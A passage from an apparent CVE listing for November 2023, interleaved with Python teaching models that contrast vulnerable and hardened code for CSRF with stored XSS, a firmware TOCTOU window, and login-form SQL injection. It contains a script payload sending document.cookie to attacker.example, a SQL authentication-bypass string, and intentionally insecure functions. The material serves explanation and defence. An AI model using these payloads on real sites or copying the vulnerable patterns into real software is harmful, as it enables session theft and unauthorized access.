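    """Anti-CSRF token bound to the victim's session and to one action."""
    msg = f"{session_id}|{action}".encode()
    return hmac.new(SERVER_SECRET, msg, hashlib.sha256).hexdigest()


def nonce_ok(session_id: str, action: str, presented) -> bool:
    if not isinstance(presented, str):
        return False
    return hmac.compare_digest(issue_nonce(session_id, action), presented)


class Settings:
    def __init__(self):
        self.footer_text = ""


def save_settings_vulnerable(store, form, session_id):
    # Only the session cookie is checked (implicitly, by the framework), so a
    # form auto-submitted from the attacker's page is accepted as the admin.
    store.footer_text = form["footer_text"]
    return True


def save_settings_hardened(store, form, session_id):
    # Fix 1: require a token the attacker's origin cannot read or forge.
    if not nonce_ok(session_id, "save_settings", form.get("_nonce")):
        return False
    store.footer_text = form["footer_text"]
    return True


def render_footer_vulnerable(store):
    return f"<footer>{store.footer_text}</footer>"


def render_footer_hardened(store):
    # Fix 2: escape on output so stored markup cannot execute even if a
    # write did get through.
    return f"<footer>{html.escape(store.footer_text)}</footer>"


PAYLOAD = '<script>new Image().src="https://attacker.example/?c="+document.cookie</script>'


def demo():
    admin_session = "sess-admin-42"  # constructed
    forged = {"footer_text": PAYLOAD}  # cross-site POST: cookie rides along, no nonce
    v = Settings()
    save_settings_vulnerable(v, forged, admin_session)
    h = Settings()
    forged_accepted = save_settings_hardened(h, forged, admin_session)
    legit = {"footer_text": "<b>Hi</b>",
             "_nonce": issue_nonce(admin_session, "save_settings")}
    legit_accepted = save_settings_hardened(h, legit, admin_session)
    return {
        "vulnerable_stores_script": PAYLOAD in render_footer_vulnerable(v),
        "hardened_accepts_forged": forged_accepted,
        "hardened_accepts_legit": legit_accepted,
        "hardened_output": render_footer_hardened(h),
    }
```

The token is keyed to both the session and the action, so a nonce leaked from one form cannot be replayed against another handler or another user. Marking the session cookie `SameSite=Lax` adds a third, browser-side layer, but it does not replace the server-side check.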
2023-11-13 CVE-2023-38364 IBM Cross-site Scripting vulnerability in IBM Cics TX 10.1

IBM CICS TX Advanced 10.1 is vulnerable to cross-site scripting.

6.1
2023-11-15 CVE-2023-5676 Eclipse Race Condition vulnerability in Eclipse Openj9

In Eclipse OpenJ9 before version 0.41.0, the JVM can be forced into an infinite busy hang on a spinlock or a segmentation fault if a shutdown signal (SIGTERM, SIGINT or SIGHUP) is received before the JVM has finished initializing.

5.9
2023-11-14 CVE-2023-44322 Siemens Unchecked Return Value vulnerability in Siemens products

Affected devices can be configured to send emails when certain events occur on the device.

5.9
2023-11-14 CVE-2023-43901 Emsigner Unspecified vulnerability in Emsigner 2.8.7

Incorrect access control in the AdHoc User creation form of EMSigner v2.8.7 allows unauthenticated attackers to arbitrarily modify usernames and privileges by using the email address of a registered user.

5.9
2023-11-14 CVE-2023-46445 Asyncssh Project Insufficient Verification of Data Authenticity vulnerability in Asyncssh Project Asyncssh

An issue in AsyncSSH before 2.14.1 allows attackers to control the extension info message (RFC 8308) via a man-in-the-middle attack, aka a "Rogue Extension Negotiation."

5.9
2023-11-14 CVE-2023-20521 AMD Time-of-check Time-of-use (TOCTOU) Race Condition vulnerability in AMD products

TOCTOU in the ASP Bootloader may allow an attacker with physical access to tamper with SPI ROM records after memory content verification, potentially leading to loss of confidentiality or a denial of service.

5.7
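The TOCTOU entry above (CVE-2023-20521) describes the classic firmware mistake: the bootloader verifies a record while it still lives in externally modifiable SPI ROM and then reads it again for use, leaving a window in which a physically present attacker can swap the bytes. The following added model, written for this report and not AMD's code, contrasts that verify-then-re-read flow with the standard fix of copying the record into private memory once and verifying and using only the copy. The `Flash` class, the SHA-256 digest standing in for a signature, and the record layout are all constructed for the illustration.

```python
import hashlib

# Constructed model (not vendor code): "flash" is a mutable bytearray standing
# in for an externally modifiable SPI ROM; the bytes returned by a single
# read() stand in for on-die SRAM the attacker cannot reach.


class Flash:
    def __init__(self, image: bytes):
        self.mem = bytearray(image)
        self.reads = 0

    def read(self, off: int, n: int) -> bytes:
        self.reads += 1
        return bytes(self.mem[off:off + n])


def make_record(payload: bytes) -> bytes:
    # record = 32-byte SHA-256 digest || payload (a plain digest stands in for
    # the signed hash a real bootloader would check)
    return hashlib.sha256(payload).digest() + payload


def boot_toctou(flash: Flash, size: int, attacker=None):
    """Verify in place, then re-read from flash: the vulnerable pattern."""
    digest = flash.read(0, 32)
    body = flash.read(32, size - 32)
    if hashlib.sha256(body).digest() != digest:
        return None
    if attacker:
        attacker(flash)  # window between the check and the use
    return flash.read(32, size - 32)  # second read returns unverified bytes


def boot_copy_then_verify(flash: Flash, size: int, attacker=None):
    """Copy once into private memory, verify the copy, use the copy."""
    sram = flash.read(0, size)
    digest, body = sram[:32], sram[32:]
    if hashlib.sha256(body).digest() != digest:
        return None
    if attacker:
        attacker(flash)  # flash changes no longer matter
    return body


def swap_payload(flash: Flash):
    # Physical-access attacker rewriting the payload region between check and use.
    evil = b"EVIL-STAGE2-----"
    flash.mem[32:32 + len(evil)] = evil
```

The hardened path still rejects an image that was tampered with before the copy was taken, so the fix costs nothing in detection; it only removes the window. The same reasoning applies to any verify-then-use of data in a buffer the other side can write to, including shared memory between a host and a security processor.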
2023-11-19 CVE-2023-5341 Imagemagick, Fedoraproject Use After Free vulnerability in multiple products

A heap use-after-free flaw was found in coders/bmp.c in ImageMagick.

5.5
2023-11-17 CVE-2023-47071 Adobe Out-of-bounds Read vulnerability in Adobe After Effects 24.0

Adobe After Effects version 24.0.2 (and earlier) and 23.6 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory.

5.5
2023-11-17 CVE-2023-44325 Adobe Out-of-bounds Read vulnerability in Adobe Animate

Adobe Animate version 23.0.2 (and earlier) is affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory.

5.5
2023-11-17 CVE-2023-44326 Adobe Out-of-bounds Read vulnerability in Adobe Dimension

Adobe Dimension version 3.4.9 (and earlier) is affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory.

5.5
2023-11-16 CVE-2023-47025 Free5Gc Resource Exhaustion vulnerability in Free5Gc 3.3.0

An issue in Free5gc v.3.3.0 allows a local attacker to cause a denial of service via the free5gc-compose component.

5.5
2023-11-16 CVE-2023-47046 Adobe Out-of-bounds Write vulnerability in Adobe Audition

Adobe Audition version 24.0 (and earlier) and 23.6.1 (and earlier) are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user.

5.5
2023-11-16 CVE-2023-47048 Adobe Out-of-bounds Read vulnerability in Adobe Audition

Adobe Audition version 24.0 (and earlier) and 23.6.1 (and earlier) are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure.

5.5
2023-11-16 CVE-2023-47049 Adobe Out-of-bounds Read vulnerability in Adobe Audition

Adobe Audition version 24.0 (and earlier) and 23.6.1 (and earlier) are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure.

5.5
2023-11-16 CVE-2023-47050 Adobe Out-of-bounds Read vulnerability in Adobe Audition

Adobe Audition version 24.0 (and earlier) and 23.6.1 (and earlier) are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure.

5.5
2023-11-16 CVE-2023-47051 Adobe Out-of-bounds Write vulnerability in Adobe Audition

Adobe Audition version 24.0 (and earlier) and 23.6.1 (and earlier) are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user.

5.5
2023-11-16 CVE-2023-47052 Adobe Out-of-bounds Read vulnerability in Adobe Audition

Adobe Audition version 24.0 (and earlier) and 23.6.1 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory.

5.5
2023-11-16 CVE-2023-47053 Adobe Access of Uninitialized Pointer vulnerability in Adobe Audition

Adobe Audition version 24.0 (and earlier) and 23.6.1 (and earlier) are affected by an Access of Uninitialized Pointer vulnerability that could lead to disclosure of sensitive memory.

5.5
2023-11-16 CVE-2023-47054 Adobe Access of Uninitialized Pointer vulnerability in Adobe Audition

Adobe Audition version 24.0 (and earlier) and 23.6.1 (and earlier) are affected by an Access of Uninitialized Pointer vulnerability that could lead to disclosure of sensitive memory.

5.5
2023-11-16 CVE-2023-44327 Adobe Access of Uninitialized Pointer vulnerability in Adobe Bridge

Adobe Bridge versions 13.0.4 (and earlier) and 14.0.0 (and earlier) are affected by an Access of Uninitialized Pointer vulnerability that could lead to disclosure of sensitive memory.

5.5
2023-11-16 CVE-2023-44328 Adobe Use After Free vulnerability in Adobe Bridge

Adobe Bridge versions 13.0.4 (and earlier) and 14.0.0 (and earlier) are affected by a Use After Free vulnerability that could lead to disclosure of sensitive memory.

5.5
2023-11-16 CVE-2023-44329 Adobe Access of Uninitialized Pointer vulnerability in Adobe Bridge

Adobe Bridge versions 13.0.4 (and earlier) and 14.0.0 (and earlier) are affected by an Access of Uninitialized Pointer vulnerability that could lead to disclosure of sensitive memory.

5.5
2023-11-16 CVE-2023-44331 Adobe Out-of-bounds Read vulnerability in Adobe Photoshop

Adobe Photoshop versions 24.7.1 (and earlier) and 25.0 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory.

5.5
2023-11-16 CVE-2023-44332 Adobe Out-of-bounds Read vulnerability in Adobe Photoshop

Adobe Photoshop versions 24.7.1 (and earlier) and 25.0 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory.

5.5
2023-11-16 CVE-2023-44333 Adobe Out-of-bounds Read vulnerability in Adobe Photoshop

Adobe Photoshop versions 24.7.1 (and earlier) and 25.0 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory.

5.5
2023-11-16 CVE-2023-44334 Adobe Out-of-bounds Read vulnerability in Adobe Photoshop

Adobe Photoshop versions 24.7.1 (and earlier) and 25.0 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory.

5.5
2023-11-16 CVE-2023-44335 Adobe Out-of-bounds Read vulnerability in Adobe Photoshop

Adobe Photoshop versions 24.7.1 (and earlier) and 25.0 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory.

5.5
2023-11-16 CVE-2023-47044 Adobe Access of Uninitialized Pointer vulnerability in Adobe Media Encoder

Adobe Media Encoder version 24.0.2 (and earlier) and 23.6 (and earlier) are affected by an Access of Uninitialized Pointer vulnerability that could lead to disclosure of sensitive memory.

5.5
2023-11-16 CVE-2023-44339 Adobe Out-of-bounds Read vulnerability in Adobe products

Adobe Acrobat Reader versions 23.006.20360 (and earlier) and 20.005.30524 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory.

5.5
2023-11-16 CVE-2023-44340 Adobe Out-of-bounds Read vulnerability in Adobe products

Adobe Acrobat Reader versions 23.006.20360 (and earlier) and 20.005.30524 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory.

5.5
2023-11-16 CVE-2023-44348 Adobe Out-of-bounds Read vulnerability in Adobe products

Adobe Acrobat Reader versions 23.006.20360 (and earlier) and 20.005.30524 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory.

5.5
2023-11-16 CVE-2023-44356 Adobe Out-of-bounds Read vulnerability in Adobe products

Adobe Acrobat Reader versions 23.006.20360 (and earlier) and 20.005.30524 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory.

5.5
2023-11-16 CVE-2023-44357 Adobe Out-of-bounds Read vulnerability in Adobe products

Adobe Acrobat Reader versions 23.006.20360 (and earlier) and 20.005.30524 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory.

5.5
2023-11-16 CVE-2023-44358 Adobe Out-of-bounds Read vulnerability in Adobe products

Adobe Acrobat Reader versions 23.006.20360 (and earlier) and 20.005.30524 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory.

5.5
2023-11-16 CVE-2023-44360 Adobe Out-of-bounds Read vulnerability in Adobe products

Adobe Acrobat Reader versions 23.006.20360 (and earlier) and 20.005.30524 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory.

5.5
2023-11-16 CVE-2023-44361 Adobe Use After Free vulnerability in Adobe products

Adobe Acrobat Reader versions 23.006.20360 (and earlier) and 20.005.30524 (and earlier) are affected by a Use After Free vulnerability that could lead to disclosure of sensitive memory.

5.5
2023-11-16 CVE-2023-44296 Dell Use of Hard-coded Credentials vulnerability in Dell E-Lab Navigator 3.1.8/3.1.9

Dell ELab-Navigator, version 3.1.9 contains a hard-coded credential vulnerability.

5.5
2023-11-15 CVE-2023-6105 Zohocorp Unspecified vulnerability in Zohocorp products

An information disclosure vulnerability exists in multiple ManageEngine products that can result in encryption keys being exposed.

5.5
2023-11-15 CVE-2023-46672 Elastic Information Exposure Through Log Files vulnerability in Elastic Logstash 7.12.1/8.10.0

An issue was identified by Elastic whereby sensitive information is recorded in Logstash logs under specific circumstances. Both of the following prerequisites must hold: (1) Logstash is configured to log in JSON format (https://www.elastic.co/guide/en/logstash/current/running-logstash-command-line.html), which is not the default logging format; (2) sensitive data is stored in the Logstash keystore and referenced as a variable in the Logstash configuration.

5.5
2023-11-15 CVE-2023-38544 Ivanti Unspecified vulnerability in Ivanti Secure Access Client 22.2/22.3

A logged in user can modify specific files that may lead to unauthorized changes in system-wide configuration settings.

5.5
2023-11-14 CVE-2023-39202 Zoom Untrusted Search Path vulnerability in Zoom Rooms and Virtual Desktop Infrastructure

Untrusted search path in Zoom Rooms Client for Windows and Zoom VDI Client may allow a privileged user to conduct a denial of service via local access.

5.5
2023-11-14 CVE-2023-36558 Microsoft Unspecified vulnerability in Microsoft .Net and Visual Studio 2022

ASP.NET Core - Security Feature Bypass Vulnerability

5.5
2023-11-14 CVE-2023-46581 Code Projects SQL Injection vulnerability in Code-Projects Inventory Management 1.0

SQL injection vulnerability in Inventory Management v.1.0 allows a local attacker to execute arbitrary code via the name, uname and email parameters in the registration.php component.

5.5
2023-11-14 CVE-2023-47384 Gpac Memory Leak vulnerability in Gpac 2.3Devrev617G671976Fccmaster

MP4Box GPAC v2.3-DEV-rev617-g671976fcc-master was discovered to contain a memory leak in the function gf_isom_add_chapter at /isomedia/isom_write.c.

5.5
2023-11-14 CVE-2021-46748 Intel, AMD Improper Restriction of Operations within the Bounds of a Memory Buffer vulnerability in multiple products

Insufficient bounds checking in the ASP (AMD Secure Processor) may allow an attacker to access memory outside the bounds of what is permissible to a TA (Trusted Application) resulting in a potential denial of service.

5.5
2023-11-14 CVE-2021-46766 AMD Incomplete Cleanup vulnerability in AMD products

Improper clearing of sensitive data in the ASP Bootloader may expose secret keys to a privileged attacker accessing ASP SRAM, potentially leading to a loss of confidentiality.

5.5
2023-11-14 CVE-2022-42879 Intel NULL Pointer Dereference vulnerability in Intel Graphics Driver

NULL pointer dereference in some Intel(R) Arc(TM) Control software before version 1.73.5335.2 may allow an authenticated user to potentially enable denial of service via local access.

5.5
2023-11-14 CVE-2022-43477 Intel Incomplete Cleanup vulnerability in Intel Unison Software

Incomplete cleanup for some Intel Unison software may allow an authenticated user to potentially enable information disclosure via local access.

5.5
2023-11-14 CVE-2022-43666 Intel Unspecified vulnerability in Intel Unison Software

Exposure of sensitive system information due to uncleared debug information for some Intel Unison software may allow an authenticated user to potentially enable information disclosure via local access.

5.5
2023-11-14 CVE-2022-45109 Intel Improper Initialization vulnerability in Intel Unison Software

Improper initialization for some Intel Unison software may allow an authenticated user to potentially enable information disclosure via local access.

5.5
2023-11-14 CVE-2022-46299 Intel Unspecified vulnerability in Intel Unison Software

Insufficient control flow management for some Intel Unison software may allow an authenticated user to potentially enable information disclosure via local access.

5.5
2023-11-14 CVE-2022-46646 Intel Unspecified vulnerability in Intel Unison Software

Exposure of sensitive information to an unauthorized actor for some Intel Unison software may allow an authenticated user to potentially enable information disclosure via local access.

5.5
2023-11-14 CVE-2022-46647 Intel Information Exposure Through Log Files vulnerability in Intel Unison Software

Insertion of sensitive information into log file for some Intel Unison software may allow an authenticated user to potentially enable information disclosure via local access.

5.5
2023-11-14 CVE-2023-22305 Intel Integer Overflow or Wraparound vulnerability in Intel Aptio V Uefi Firmware Integrator Tools 5.27.03.0003/5.27.06.0017

Integer overflow in some Intel(R) Aptio* V UEFI Firmware Integrator Tools may allow an authenticated user to potentially enable denial of service via local access.

5.5
2023-11-14 CVE-2023-25071 Intel NULL Pointer Dereference vulnerability in Intel ARC a Graphics and Iris XE Graphics

NULL pointer dereference in some Intel(R) Arc(TM) & Iris(R) Xe Graphics - WHQL - Windows drivers before version 31.0.101.4255 may allow an authenticated user to potentially enable denial of service via local access.

5.5
2023-11-14 CVE-2023-25080 Intel Unspecified vulnerability in Intel Openvino 2018

Protection mechanism failure in some Intel(R) Distribution of OpenVINO toolkit software before version 2023.0.0 may allow an authenticated user to potentially enable information disclosure via local access.

5.5
2023-11-14 CVE-2023-25949 Intel Resource Exhaustion vulnerability in Intel Aptio V Uefi Firmware Integrator Tools 5.27.03.0003/5.27.06.0017

Uncontrolled resource consumption in some Intel(R) Aptio* V UEFI Firmware Integrator Tools may allow an authenticated user to potentially enable denial of service via local access.

5.5
2023-11-14 CVE-2023-25952 Intel Out-of-bounds Write vulnerability in Intel ARC a Graphics and Iris XE Graphics

Out-of-bounds write in some Intel(R) Arc(TM) Control software before version 1.73.5335.2 may allow an authenticated user to potentially enable denial of service via local access.

5.5
2023-11-14 CVE-2023-26589 Intel Use After Free vulnerability in Intel Aptio V Uefi Firmware Integrator Tools 5.27.03.0003/5.27.06.0017

Use after free in some Intel(R) Aptio* V UEFI Firmware Integrator Tools may allow an authenticated user to potentially enable denial of service via local access.

5.5
2023-11-14 CVE-2023-27306 Intel Improper Initialization vulnerability in Intel products

Improper Initialization in firmware for some Intel(R) Optane(TM) SSD products may allow an authenticated user to potentially enable denial of service via local access.

5.5
2023-11-14 CVE-2023-28404 Intel Out-of-bounds Read vulnerability in Intel ARC a Graphics and Iris XE Graphics

Out-of-bounds read in the Intel(R) Arc(TM) & Iris(R) Xe Graphics - WHQL - Windows drivers before version 31.0.101.4255 may allow an authenticated user to potentially enable information disclosure via local access.

5.5
2023-11-14 CVE-2023-28723 Intel Unspecified vulnerability in Intel Aptio V Uefi Firmware Integrator Tools 5.27.03.0003/5.27.06.0017

Exposure of sensitive information to an unauthorized actor in some Intel(R) Aptio* V UEFI Firmware Integrator Tools may allow an authenticated user to potentially enable information disclosure via local access.

5.5
2023-11-14 CVE-2023-32283 Intel Information Exposure Through Log Files vulnerability in Intel on Demand 1.16.1.1/2.1.0.1/3.0.1.3

Insertion of sensitive information into log file in some Intel(R) On Demand software before versions 1.16.2, 2.1.1, 3.1.0 may allow an authenticated user to potentially enable information disclosure via local access.

5.5
2023-11-14 CVE-2023-33872 Intel Unspecified vulnerability in Intel Support

Improper access control in the Intel Support Android application, all versions, may allow an authenticated user to potentially enable information disclosure via local access.

5.5
2023-11-14 CVE-2023-40719 Fortinet Use of Hard-coded Credentials vulnerability in Fortinet Fortianalyzer and Fortimanager

A use of hard-coded credentials vulnerability in Fortinet FortiAnalyzer and FortiManager 7.0.0 - 7.0.8, 7.2.0 - 7.2.3 and 7.4.0 allows an attacker to access Fortinet private testing data via the use of static credentials.

5.5
2023-11-14 CVE-2023-33304 Fortinet Use of Hard-coded Credentials vulnerability in Fortinet Forticlient

A use of hard-coded credentials vulnerability in Fortinet FortiClient Windows 7.0.0 - 7.0.9 and 7.2.0 - 7.2.1 allows an attacker to bypass system protections via the use of static credentials.

5.5
2023-11-14 CVE-2023-36042 Microsoft Resource Exhaustion vulnerability in Microsoft Visual Studio 2019 and Visual Studio 2022

Visual Studio Denial of Service Vulnerability

5.5
2023-11-14 CVE-2023-36404 Microsoft Unspecified vulnerability in Microsoft products

Windows Kernel Information Disclosure Vulnerability

5.5
2023-11-14 CVE-2023-36406 Microsoft Unspecified vulnerability in Microsoft products

Windows Hyper-V Information Disclosure Vulnerability

5.5
2023-11-14 CVE-2023-36428 Microsoft Unspecified vulnerability in Microsoft products

Microsoft Local Security Authority Subsystem Service Information Disclosure Vulnerability

5.5
2023-11-14 CVE-2023-44248 Fortinet Improper Access Control vulnerability in Fortinet Fortiedr 4.0.0/5.0.3

An improper access control vulnerability [CWE-284] in FortiEDRCollectorWindows version 5.2.0.4549 and below, 5.0.3.1007 and below, and all 4.0 releases may allow a local attacker to prevent the collector service from starting at the next system reboot by tampering with some registry keys of the service.

5.5
2023-11-13 CVE-2023-46021 Code Projects SQL Injection vulnerability in Code-Projects Blood Bank 1.0

SQL Injection vulnerability in cancel.php in Code-Projects Blood Bank 1.0 allows attackers to run arbitrary SQL commands via the 'reqid' parameter.

5.5
2023-11-13 CVE-2023-46014 Code Projects SQL Injection vulnerability in Code-Projects Blood Bank 1.0

SQL Injection vulnerability in hospitalLogin.php in Code-Projects Blood Bank 1.0 allows attackers to run arbitrary SQL commands via 'hemail' and 'hpassword' parameters.

5.5
2023-11-13 CVE-2023-46017 Code Projects SQL Injection vulnerability in Code-Projects Blood Bank 1.0

SQL Injection vulnerability in receiverLogin.php in Code-Projects Blood Bank 1.0 allows attackers to run arbitrary SQL commands via 'remail' and 'rpassword' parameters.

5.5
2023-11-13 CVE-2023-46018 Code Projects SQL Injection vulnerability in Code-Projects Blood Bank 1.0

SQL injection vulnerability in receiverReg.php in Code-Projects Blood Bank 1.0 allows attackers to run arbitrary SQL commands via the 'remail' parameter.

5.5
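The four Blood Bank entries above, and the Inventory Management entry earlier in this section, are textbook login-form SQL injection: the e-mail and password parameters are concatenated into the query string, so a value such as `x' OR '1'='1' -- ` authenticates without a valid password. The following is an added illustration of that class, constructed for this report and not taken from Code-Projects; it uses the page's `remail`/`rpassword` parameter names on a hypothetical in-memory SQLite table and shows the vulnerable concatenation beside the parameterized query that defeats it. The schema, the seeded account and the payload are all constructed. It isolates the injection only; a real login must additionally store salted password hashes rather than compare plaintext.

```python
import sqlite3

# Constructed example (not the Code-Projects application): a login query built
# by string concatenation beside its parameterized equivalent.


def make_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    # Hypothetical schema using the parameter names from the advisories.
    con.execute("CREATE TABLE receiver(remail TEXT, rpassword TEXT)")
    con.execute("INSERT INTO receiver VALUES ('alice@example.org', 'correct-horse')")
    return con


def login_vulnerable(con, remail: str, rpassword: str):
    # User input spliced straight into SQL text; quotes in the input end the
    # literal and the rest is parsed as SQL.
    sql = (f"SELECT remail FROM receiver "
           f"WHERE remail='{remail}' AND rpassword='{rpassword}'")
    row = con.execute(sql).fetchone()
    return row[0] if row else None


def login_hardened(con, remail: str, rpassword: str):
    # Placeholders keep the input as data: the driver binds it, the SQL text
    # never changes, and the quote character has no syntactic meaning.
    row = con.execute(
        "SELECT remail FROM receiver WHERE remail=? AND rpassword=?",
        (remail, rpassword),
    ).fetchone()
    return row[0] if row else None


# Classic bypass: closes the remail literal, adds an always-true clause, and
# comments out the password check. The trailing space after -- matters in
# some dialects, so it is kept.
BYPASS = "x' OR '1'='1' -- "


def demo() -> dict:
    con = make_db()
    return {
        "vulnerable_bypass": login_vulnerable(con, BYPASS, "anything"),
        "hardened_bypass": login_hardened(con, BYPASS, "anything"),
        "hardened_valid": login_hardened(con, "alice@example.org", "correct-horse"),
        "hardened_wrong_pw": login_hardened(con, "alice@example.org", "nope"),
    }
```

The same placeholder discipline applies to the `reqid` parameter in cancel.php and to the registration path: any value that reaches the query text, not only credentials, is an injection point. Parameterization fixes the query; input validation (for example, rejecting a `reqid` that is not an integer) is a second, independent layer rather than a substitute.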
2023-11-18 CVE-2023-44796 Limesurvey Cross-site Scripting vulnerability in Limesurvey

Cross Site Scripting (XSS) vulnerability in LimeSurvey before version 6.2.9-230925 allows a remote attacker to escalate privileges via a crafted script to the _generaloptions_panel.php component.

5.4
2023-11-17 CVE-2023-48295 Librenms Cross-site Scripting vulnerability in Librenms

LibreNMS is an auto-discovering PHP/MySQL/SNMP based network monitoring system which includes support for a wide range of network hardware and operating systems.

5.4
2023-11-17 CVE-2023-5445 Mcafee Open Redirect vulnerability in Mcafee Epolicy Orchestrator

An open redirect vulnerability in ePolicy Orchestrator prior to 5.10.0 CP1 Update 2, allows a remote low privileged user to modify the URL parameter for the purpose of redirecting URL request(s) to a malicious site.

5.4
2023-11-17 CVE-2023-48649 Concretecms Cross-site Scripting vulnerability in Concretecms Concrete CMS

Concrete CMS before 8.5.13 and 9.x before 9.2.2 allows stored XSS on the Admin page via an uploaded file name.

5.4
2023-11-16 CVE-2023-48222 Pagerduty Missing Authorization vulnerability in Pagerduty Rundeck

Rundeck is an open source automation service with a web console, command line tools and a WebAPI.

5.4
2023-11-16 CVE-2023-47239 Wpplugin Cross-site Scripting vulnerability in Wpplugin Easy Paypal Shopping Cart

Auth.

5.4
2023-11-16 CVE-2023-47240 Codebxr Cross-site Scripting vulnerability in Codebxr CBX MAP for Google MAP & Openstreetmap

Auth.

5.4
2023-11-16 CVE-2023-47242 Marcomilesi Cross-site Scripting vulnerability in Marcomilesi Anac XML Bandi DI Gara

Auth.

5.4
2023-11-16 CVE-2023-6013 H2O Unspecified vulnerability in H2O

H2O is vulnerable to a stored XSS vulnerability that can lead to a Local File Include attack.

5.4
2023-11-15 CVE-2023-48197 Grocy Project Cross-site Scripting vulnerability in Grocy Project Grocy 4.0.3

Cross-Site Scripting (XSS) vulnerability in the ‘manageApiKeys’ component of Grocy 4.0.3 and earlier allows attackers to obtain victim's cookies when the victim clicks on the "see QR code" function.

5.4
2023-11-15 CVE-2023-48198 Grocy Project Cross-site Scripting vulnerability in Grocy Project Grocy 4.0.3

A Cross-Site Scripting (XSS) vulnerability in the 'product description' component within '/api/stock/products' of Grocy version <= 4.0.3 allows attackers to obtain a victim's cookies.

5.4
2023-11-15 CVE-2023-48200 Grocy Project Cross-site Scripting vulnerability in Grocy Project Grocy 4.0.3

Cross Site Scripting vulnerability in Grocy v.4.0.3 allows a local attacker to execute arbitrary script and obtain sensitive information via the equipment description field within the /equipment/ component.

5.4
2023-11-15 CVE-2023-48087 Xuxueli Incorrect Permission Assignment for Critical Resource vulnerability in Xuxueli Xxl-Job 2.4.0

xxl-job-admin 2.4.0 is vulnerable to Insecure Permissions via /xxl-job-admin/joblog/clearLog and /xxl-job-admin/joblog/logDetailCat.

5.4
2023-11-15 CVE-2023-48088 Xuxueli Cross-site Scripting vulnerability in Xuxueli Xxl-Job 2.4.0

xxl-job-admin 2.4.0 is vulnerable to Cross Site Scripting (XSS) via /xxl-job-admin/joblog/logDetailPage.

5.4
2023-11-15 CVE-2023-4889 Shareaholic Cross-site Scripting vulnerability in Shareaholic

The Shareaholic plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'shareaholic' shortcode in versions up to, and including, 9.7.8 due to insufficient input sanitization and output escaping on user supplied attributes.

5.4
2023-11-15 CVE-2023-47446 Phpgurukul Cross-site Scripting vulnerability in PHPgurukul Pre-School Enrollment System 1.0

Pre-School Enrollment version 1.0 is vulnerable to Cross Site Scripting (XSS) on the profile.php page via fullname parameter.

5.4
2023-11-15 CVE-2023-47309 Nukium Cross-site Scripting vulnerability in Nukium GLS 3.0.1

Nukium nkmgls before version 3.0.2 is vulnerable to Cross Site Scripting (XSS) via NkmGlsCheckoutModuleFrontController::displayAjaxSavePhoneMobile.

5.4
2023-11-14 CVE-2023-46580 Code Projects Cross-site Scripting vulnerability in Code-Projects Inventory Management 1.0

Cross-Site Scripting (XSS) vulnerability in Inventory Management V1.0 allows attackers to inject arbitrary script via the pname parameter of the editProduct.php component.

5.4
2023-11-14 CVE-2023-47545 Fatcatapps Cross-site Scripting vulnerability in Fatcatapps Forms for Mailchimp BY Optin CAT

Auth.

5.4
2023-11-14 CVE-2023-26222 Tibco Cross-site Scripting vulnerability in Tibco EBX

The Web Application component of TIBCO Software Inc.'s TIBCO EBX and TIBCO Product and Service Catalog powered by TIBCO EBX contains an easily exploitable vulnerability that allows a low privileged attacker with network access to execute a stored XSS on the affected system.

5.4
2023-11-14 CVE-2023-47127 Typo3 Improper Authentication vulnerability in Typo3

TYPO3 is an open source PHP based web content management system released under the GNU GPL.

5.4
2023-11-14 CVE-2023-47654 Livescore Cross-site Scripting vulnerability in Livescore Bzscore

Auth.

5.4
2023-11-14 CVE-2023-47656 Marcomilesi Cross-site Scripting vulnerability in Marcomilesi Anac XML Bandi DI Gara

Auth.

5.4
2023-11-14 CVE-2023-36031 Microsoft Cross-site Scripting vulnerability in Microsoft Dynamics 365

Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability

5.4
2023-11-14 CVE-2023-36410 Microsoft Cross-site Scripting vulnerability in Microsoft Dynamics 365

Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability

5.4
2023-11-14 CVE-2023-36633 Fortinet Incorrect Permission Assignment for Critical Resource vulnerability in Fortinet Fortimail

An improper authorization vulnerability [CWE-285] in FortiMail webmail version 7.2.0 through 7.2.2 and before 7.0.5 allows an authenticated attacker to see and modify the title of address book folders of other users via crafted HTTP or HTTPS requests.

5.4
2023-11-14 CVE-2023-47659 Lava Code Cross-site Scripting vulnerability in Lava-Code Lava Directory Manager

Auth.

5.4
2023-11-14 CVE-2023-6127 Salesagility Unrestricted Upload of File with Dangerous Type vulnerability in Salesagility Suitecrm

Unrestricted Upload of File with Dangerous Type in GitHub repository salesagility/suitecrm prior to 7.14.2, 7.12.14, 8.4.2.

5.4
2023-11-14 CVE-2023-6128 Salesagility Cross-site Scripting vulnerability in Salesagility Suitecrm

Cross-site Scripting (XSS) - Reflected in GitHub repository salesagility/suitecrm prior to 7.14.2, 7.12.14, 8.4.2.

5.4
2023-11-14 CVE-2023-45879 Gibbonedu Cross-site Scripting vulnerability in Gibbonedu Gibbon

